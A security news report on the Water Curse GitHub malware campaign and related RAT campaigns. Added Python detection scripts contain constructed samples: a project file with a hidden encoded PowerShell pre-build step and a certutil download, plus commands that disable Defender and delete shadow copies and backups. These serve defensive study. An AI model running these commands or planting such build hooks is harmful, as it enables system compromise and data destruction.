Cybersecurity researchers have exposed a previously unknown threat actor, tracked as Water Curse, that relies on weaponized GitHub repositories to deliver multi-stage malware.
"The malware enables data exfiltration (including credentials, browser data and session tokens), remote access and long-term persistence on infected systems," Trend Micro researchers Jovit Samaniego, Aira Marcelo, Mohamed Fahmy and Gabriel Nicoleta noted in an analysis published this week.
The campaign, which the company describes as "broad and sustained" and first noticed last month, used repositories that offered seemingly harmless penetration-testing utilities, such as SMTP Email Bomber and Sakura RAT, but carried malicious payloads embedded in their Visual Studio project configuration settings.
Water Curse's arsenal spans a wide range of tooling and programming languages, reflecting cross-functional development capabilities and a focus on the supply chain through "stealer-oriented developer tooling that blurs the line between red team tools and active malware distribution."
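The point worth operationalizing from the paragraph above is that a payload placed in a Visual Studio project's configuration runs the moment someone builds the "utility". The script below is an added example, not code from the Trend Micro report or from the repositories it describes: it parses an MSBuild project file for the three places MSBuild will execute arbitrary commands during a build (the PreBuildEvent and PostBuildEvent properties and Exec tasks) and flags commands that trip a few heuristics. The sample .csproj, the example.invalid URL and the base64 blob are constructed for the demonstration, and the heuristic patterns are an assumption to tune, not indicators taken from the report.

```python
"""Flag MSBuild project files whose build steps execute commands.

Added example (not from the Trend Micro report). MSBuild evaluates the
PreBuildEvent/PostBuildEvent properties and <Exec> tasks when a project is
built, so cloning a "pentest utility" and pressing Build is enough to run
whatever they contain. The project XML below is constructed for the demo.
"""
import re
import xml.etree.ElementTree as ET

# Heuristics for commands that have no business in a build step. These are an
# assumption for this example, not indicators taken from the report.
HEURISTICS = [
    ("hidden/encoded powershell",
     re.compile(r"powershell(\.exe)?\b.*?(-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden|bypass)",
                re.I | re.S)),
    ("lolbin",
     re.compile(r"\b(certutil|bitsadmin|mshta|wscript|cscript|regsvr32|rundll32)\b", re.I)),
    ("remote fetch",
     re.compile(r"https?://|\bcurl\b|\bwget\b|Invoke-WebRequest|DownloadString|DownloadFile", re.I)),
]

# Constructed old-style (namespaced) project: one benign post-build copy, one
# hidden encoded PowerShell pre-build step (placeholder base64, not a real
# payload) and an Exec task that fetches an archive with certutil.
SAMPLE_CSPROJ = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <PreBuildEvent>powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA</PreBuildEvent>
    <PostBuildEvent>xcopy "$(TargetDir)*.dll" "$(SolutionDir)out\\" /Y</PostBuildEvent>
  </PropertyGroup>
  <Target Name="Stage" BeforeTargets="Build">
    <Exec Command="certutil -urlcache -f http://example.invalid/s.zip s.zip" />
  </Target>
</Project>
"""


def _local(tag):
    """Drop the XML namespace that old-style (non-SDK) project files carry."""
    return tag.rsplit("}", 1)[-1]


def find_build_hooks(project_xml):
    """Return (location, command) for every build-time command in the project."""
    hooks = []
    for el in ET.fromstring(project_xml).iter():
        tag = _local(el.tag)
        if tag in ("PreBuildEvent", "PostBuildEvent") and el.text and el.text.strip():
            hooks.append((tag, el.text.strip()))
        elif tag == "Exec" and el.get("Command"):
            hooks.append(("Exec", el.get("Command").strip()))
    return hooks


def suspicious_hooks(project_xml):
    """Return (location, command, [reasons]) for hooks that trip a heuristic."""
    flagged = []
    for loc, cmd in find_build_hooks(project_xml):
        reasons = [name for name, rx in HEURISTICS if rx.search(cmd)]
        if reasons:
            flagged.append((loc, cmd, reasons))
    return flagged


if __name__ == "__main__":
    for loc, cmd, reasons in suspicious_hooks(SAMPLE_CSPROJ):
        print(f"{loc}: {', '.join(reasons)}\n    {cmd}")
```

Run it over every .csproj, .vcxproj and .targets file in a checkout before opening the solution; the benign xcopy step passes while the encoded PowerShell pre-build event and the certutil download are reported.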
"Once executed, the malicious payloads initiated complex multi-stage infection chains using obfuscated scripts written in Visual Basic Script (VBS) and PowerShell," the researchers said. "These scripts downloaded encrypted archives, extracted Electron-based applications and performed extensive system reconnaissance."
The attacks are also characterized by the use of anti-debugging techniques, privilege escalation methods and persistence mechanisms to maintain a long-term foothold on affected hosts. PowerShell scripts are also used to weaken host defenses and inhibit system recovery.
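Weakening host defenses and inhibiting recovery leaves a trace wherever PowerShell script-block logging is on (Windows writes each executed block to the Microsoft-Windows-PowerShell/Operational log as event 4104 once the Script Block Logging policy is enabled). The triage below is an added example, not part of the Trend Micro analysis: it runs a small rule set over 4104-shaped records and maps hits to the MITRE ATT&CK techniques they correspond to. The records are constructed stand-ins for exported events, and the rules are assumptions built on well-known Defender, vssadmin, bcdedit and wbadmin commands rather than commands taken from the report.

```python
"""Triage PowerShell script-block logs for defense weakening and recovery inhibition.

Added example, not part of the Trend Micro analysis. The event records are
constructed to look like 4104 entries; the rules are assumptions built on
well-known commands, not indicators from the report.
"""
import re

# (ATT&CK technique, label, pattern). T1562.001 = Impair Defenses: Disable or
# Modify Tools; T1490 = Inhibit System Recovery.
RULES = [
    ("T1562.001", "Defender protection feature disabled",
     re.compile(r"Set-MpPreference\b[^\n]*-Disable\w+\s+\$?true", re.I)),
    ("T1562.001", "Defender exclusion added",
     re.compile(r"(Set|Add)-MpPreference\b[^\n]*-Exclusion(Path|Process|Extension)\b", re.I)),
    ("T1490", "Volume shadow copies deleted",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("T1490", "Windows recovery disabled via bcdedit",
     re.compile(r"bcdedit(\.exe)?\b[^\n]*(recoveryenabled\s+(no|off)|bootstatuspolicy\s+ignoreallfailures)",
                re.I)),
    ("T1490", "Backup catalog deleted",
     re.compile(r"wbadmin(\.exe)?\s+delete\s+(catalog|systemstatebackup)", re.I)),
]

SAMPLE_EVENTS = [  # constructed 4104-shaped records
    {"EventID": 4104, "Computer": "ws01",
     "ScriptBlockText": "Get-ChildItem -Recurse | Where-Object Length -gt 1MB"},
    {"EventID": 4104, "Computer": "ws02",
     "ScriptBlockText": "Set-MpPreference -DisableRealtimeMonitoring $true; "
                        "Add-MpPreference -ExclusionPath $env:APPDATA"},
    {"EventID": 4104, "Computer": "ws02",
     "ScriptBlockText": "vssadmin delete shadows /all /quiet\n"
                        "bcdedit /set {default} recoveryenabled no\n"
                        "wbadmin delete catalog -quiet"},
    {"EventID": 4103, "Computer": "ws03",  # pipeline event, not a script block: ignored
     "ScriptBlockText": "vssadmin delete shadows /all"},
]


def scan_script_block(text):
    """Return (technique, label) for every rule that matches one script block."""
    return [(tech, label) for tech, label, rx in RULES if rx.search(text)]


def triage(events):
    """Run the rules over 4104 records and return one finding per rule hit."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        for tech, label in scan_script_block(ev.get("ScriptBlockText", "")):
            findings.append({"host": ev["Computer"], "technique": tech, "label": label})
    return findings


def hosts_by_technique(findings):
    """Collapse findings to {technique: sorted hosts} for a quick priority list."""
    out = {}
    for f in findings:
        out.setdefault(f["technique"], set()).add(f["host"])
    return {t: sorted(h) for t, h in out.items()}


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['technique']} {f['label']}")
```

A host that trips both T1562.001 and T1490 within minutes is the pattern described above; the ordinary file listing on ws01 produces nothing, and the 4103 record is skipped because the rules are written for script-block text only.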
Water Curse has been described as a financially motivated threat actor driven by credential theft, session hijacking and the resale of illicit access. As many as 76 GitHub accounts have been linked to the campaign. There is evidence to suggest that related activity may date back to March 2023.
The emergence of Water Curse is the latest example of how threat actors abuse the trust placed in legitimate platforms such as GitHub, using them as a delivery channel for malware and to stage software supply chain attacks.
"Their repositories include malware, evasion tools, game cheats, aimbots, wallet tools, scrapers, spamming and stealer tools," Trend Micro said. "This reflects a multi-pronged targeting strategy that combines cybercrime with opportunistic monetization."
"Their infrastructure and behavior indicate a focus on persistence, automation and scalability, with active expansion through Telegram and file-sharing services."
The disclosure comes as several campaigns have been observed using the common ClickFix strategy to deploy different malware families such as AsyncRAT (via a loader named Hijack Loader), Filch Stealer, LightPerlGirl and SectopRAT (also via Hijack Loader).
AsyncRAT, one of many readily available remote access trojans (RATs), has also been used in campaigns documented by Forcepoint in August 2024 and January 2025.
"This tradecraft allows the malware to bypass traditional perimeter defenses, particularly by using Cloudflare tunnels to serve payloads from seemingly legitimate infrastructure," Halcyon noted. "These tunnels give attackers ephemeral and unregistered subdomains that appear trustworthy to perimeter controls, making them difficult to block or blacklist."
"Because the infrastructure is dynamically provisioned through legitimate services, defenders face challenges in distinguishing malicious use from authorized DevOps or IT workflows. This tactic allows threat actors to deliver payloads without relying on compromised servers or bulletproof hosting."
The findings also follow the disclosure of an ongoing malicious campaign targeting various European organizations located in Spain, Portugal, Italy, France, Belgium and the Netherlands with invoice-themed lures to deliver a RAT called Sorillus.
Previous campaigns distributing the malware targeted accounting and tax professionals with tax return-themed lures, some of which used HTML smuggling techniques to conceal the malicious payloads.
In the attack chain detailed by Orange Cyberdefense, the phishing emails trick recipients into opening PDF attachments containing a OneDrive link, which points to a PDF file hosted directly on the cloud storage service while urging the user to click the document.
This redirects the victim to a malicious web server that acts as a traffic distribution system (TDS), evaluating the incoming request to determine whether it should proceed to the next stage of the infection. If the victim's machine meets the required criteria, a benign PDF is displayed while a JAR file is downloaded to drop and execute Sorillus RAT.
A Java-based RAT that first appeared in 2019, Sorillus is cross-platform malware that can collect sensitive information, upload and download files, take screenshots, record audio, run arbitrary commands and even uninstall itself. It also does not help that many versions of the trojan are available online.
The attacks are assessed to be part of a broader campaign observed targeting Italian users with SambaSpy. SambaSpy, according to Orange Cyberdefense, belongs to the Sorillus malware family.
"The operation demonstrates a strategic blend of legitimate services, such as OneDrive, MediaFire and tunneling platforms like ngrok and LocalToNet, to evade detection," the cybersecurity company said. "The repeated use of Brazilian Portuguese in the payloads supports the likely attribution to Brazilian-speaking threat actors."
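Both the Halcyon remarks on Cloudflare tunnels and the Orange Cyberdefense note on ngrok and LocalToNet come down to the same defensive problem: the hostname changes with every tunnel, so exact-hostname blocklists never catch up, while the provider's parent domain is constant. The script below is an added example, not code from Halcyon, Orange Cyberdefense or Trend Micro: it matches web proxy log entries against tunnel-provider parent domains on a label boundary and reports requests that pulled executable-style content from such a hostname, together with the parent domain to block or alert on. The provider list (trycloudflare.com for Cloudflare quick tunnels, the ngrok endpoint domains, localto.net for LocalToNet) and the log lines are constructed assumptions for the demonstration; verify the domains against each vendor's documentation before deploying.

```python
"""Spot payload fetches from ephemeral tunnel subdomains in web proxy logs.

Added example, not code from Halcyon, Orange Cyberdefense or Trend Micro.
The provider domains and the log lines are constructed assumptions for the
demonstration.
"""
import posixpath
from urllib.parse import urlsplit

# Parent domains under which tunnel services issue throwaway hostnames
# (assumption: check each vendor's documentation before relying on these).
TUNNEL_PROVIDERS = {
    "cloudflare-quick-tunnel": ("trycloudflare.com",),
    "ngrok": ("ngrok.io", "ngrok.app", "ngrok-free.app"),
    "localtonet": ("localto.net",),
}

# File types a workstation should rarely pull from a throwaway tunnel.
RISKY_EXT = {".exe", ".dll", ".zip", ".rar", ".7z", ".jar", ".ps1", ".vbs", ".js", ".hta", ".msi"}
RISKY_TYPES = {"application/zip", "application/java-archive",
               "application/x-msdownload", "application/octet-stream"}

SAMPLE_LOG = [  # constructed: time src method url status content-type bytes
    "2025-06-17T10:02:11Z 10.0.0.21 GET https://a1b2-c3d4.trycloudflare.com/update/loader.zip 200 application/zip 184320",
    "2025-06-17T10:02:15Z 10.0.0.21 GET https://a1b2-c3d4.trycloudflare.com/update/stage2.ps1 200 text/plain 9120",
    "2025-06-17T10:05:40Z 10.0.0.33 GET https://www.cloudflare.com/learning/ 200 text/html 51200",
    "2025-06-17T10:07:02Z 10.0.0.44 GET https://9f8e7d6c.ngrok-free.app/client.jar 200 application/java-archive 2240000",
    "2025-06-17T10:09:30Z 10.0.0.44 GET https://cdn.example.invalid/jquery.min.js 200 application/javascript 89000",
]


def _match(host):
    """Return (provider, parent_domain) for a tunnel hostname, else (None, None).

    The match is on a label boundary: 'x.trycloudflare.com' matches,
    'notrycloudflare.com' does not.
    """
    host = host.lower().rstrip(".")
    for provider, parents in TUNNEL_PROVIDERS.items():
        for parent in parents:
            if host == parent or host.endswith("." + parent):
                return provider, parent
    return None, None


def tunnel_provider(host):
    """Name the tunnel service a hostname belongs to, or None."""
    return _match(host)[0]


def block_key(host):
    """The parent domain to block or alert on for a tunnel hostname, or None."""
    return _match(host)[1]


def suspicious_downloads(lines):
    """Return one dict per request that pulled risky content from a tunnel hostname."""
    hits = []
    for line in lines:
        ts, src, method, url, status, ctype, size = line.split()
        parts = urlsplit(url)
        host = parts.hostname or ""
        provider = tunnel_provider(host)
        if provider is None:
            continue
        ext = posixpath.splitext(parts.path)[1].lower()
        if ext in RISKY_EXT or ctype.lower() in RISKY_TYPES:
            hits.append({"time": ts, "src": src, "host": host, "path": parts.path,
                         "provider": provider, "block": block_key(host)})
    return hits


if __name__ == "__main__":
    for h in suspicious_downloads(SAMPLE_LOG):
        print(f"{h['time']} {h['src']} -> {h['host']}{h['path']} [{h['provider']}] block {h['block']}")
```

The legitimate cloudflare.com page and the CDN script are left alone; the two fetches from the quick-tunnel hostname and the JAR from the ngrok endpoint are reported, each with the parent domain that stays constant across tunnels.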